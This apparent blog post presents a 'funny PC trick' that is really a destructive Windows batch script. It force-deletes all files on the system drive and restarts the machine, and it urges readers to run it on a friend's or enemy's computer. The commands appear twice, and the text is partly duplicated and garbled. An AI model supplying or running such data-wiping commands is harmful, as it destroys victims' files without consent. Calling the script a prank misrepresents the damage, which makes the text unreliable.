A funny PC trick to prank your friends
It is a simple virus which cant detect by any antivirus.
first, Type this in your notepad:
@Echo off
Del C:\ *.*
y
or better version
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
And save that as .bat and RUN IT
It will delete the content of C:\ drive...........!
PLEASE NoTe: don't run that .bat file on your system .............. it will delete your C:/ drive.
Del C:\ *.*
y
or better version
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
And save that as .bat and RUN IT
It will delete the content of C:\ drive...........!
PLEASE NoTe: don't run that .bat file on your system .............. it will delete your C:/ drive.
Even i didn't try this.
you can try and run this on your waste old PC's.......!
OR
in your friend's or enemy's PC's. ( be responsibility of your friends)
0 comments:
Post a Comment